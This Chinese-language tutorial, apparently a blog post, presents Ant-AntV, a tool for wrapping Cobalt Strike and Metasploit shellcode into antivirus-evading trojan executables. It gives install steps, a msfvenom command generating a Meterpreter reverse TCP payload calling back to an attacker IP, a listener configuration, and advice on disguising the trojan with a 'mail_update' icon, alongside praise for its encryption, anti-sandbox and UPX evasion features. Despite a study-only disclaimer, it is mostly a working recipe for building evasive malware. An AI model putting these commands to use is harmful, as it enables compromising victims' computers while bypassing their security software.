本文我们来介绍一款在Cs和Msf中较好的免杀工具吧。

注意： 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为！造成法律后果与本文无关。

环境

• Kali Linux
• python3.8

安装

git clone https://github.com/shellfeel/Ant-AntV
cd Ant-AntV
pip install -r requirements.txt

生成shellcode

这里我们以cs为例。生成.bin格式的。

将生成的shellcode命名成beacon.bin 放到当前bean_raw路径下 如需给程序加上ico，可以将ico命名成mail_update.ico(可修改gen_trojan.py 48行形参out_file_name 来更改，这个参数本身也是生成的程序名)放入resource目录 执行下面命令进行打包程序。

python gen_trojan.py

打包完成后，效果如下

msf

生成shell

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.12.22 LPORT=5555 -f raw -o 1.bin

利用上述同样的方式进行处理 配置msf

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit

免杀效果

(再此特别感谢群内小伙伴的测试！???)

Cs成功上线

总结

使用随机密钥（混淆加密、shellcode加密），所以每次生成的程序都是全新的，避免被杀软散列标记导致全部失效。支持反沙箱逻辑、支持混淆、支持upx压缩。